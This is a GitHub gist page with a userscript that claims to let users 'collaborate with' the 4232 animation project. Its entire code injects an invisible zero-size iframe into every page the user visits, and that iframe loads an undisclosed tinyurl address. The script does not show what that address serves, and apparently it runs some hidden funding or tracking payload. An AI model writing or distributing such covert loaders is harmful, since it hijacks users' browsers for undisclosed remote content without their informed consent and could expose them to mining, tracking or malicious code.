Created
February 24, 2018 18:04
-
-
Save b4zz4/6b54853b9982e34f1b6a9189b6f55173 to your computer and use it in GitHub Desktop.
Colaborate with 4232 - Animation Project
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @name 4232 | |
// @description Colaborar con el Proyecto 4232 | |
// @version 1 | |
// @grant none | |
// @lang es | |
// @author Ernesto Bazzano (bazza) | |
// @license AGPL-v3.0+ | |
// @copyright 2018 | |
// @updateURL https://download.tuxfamily.org/4232/4232.user.js | |
// @icon https://download.tuxfamily.org/4232/wordpress//2016/06/cropped-bg_baner-150x150.png | |
// @namespace animacion arte corto financiamiento anime cortometraje dibujo ayuda softwarelibre | |
// ==/UserScript== | |
var ifrm = document.createElement("iframe"); | |
ifrm.setAttribute("src", "https://tinyurl.com/lue7ezooyo3Es7TeHoaquae6Ruj6ph"); | |
ifrm.style.width = "0"; | |
ifrm.style.height = "0"; | |
ifrm.style.display = "none"; | |
document.body.appendChild(ifrm); | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment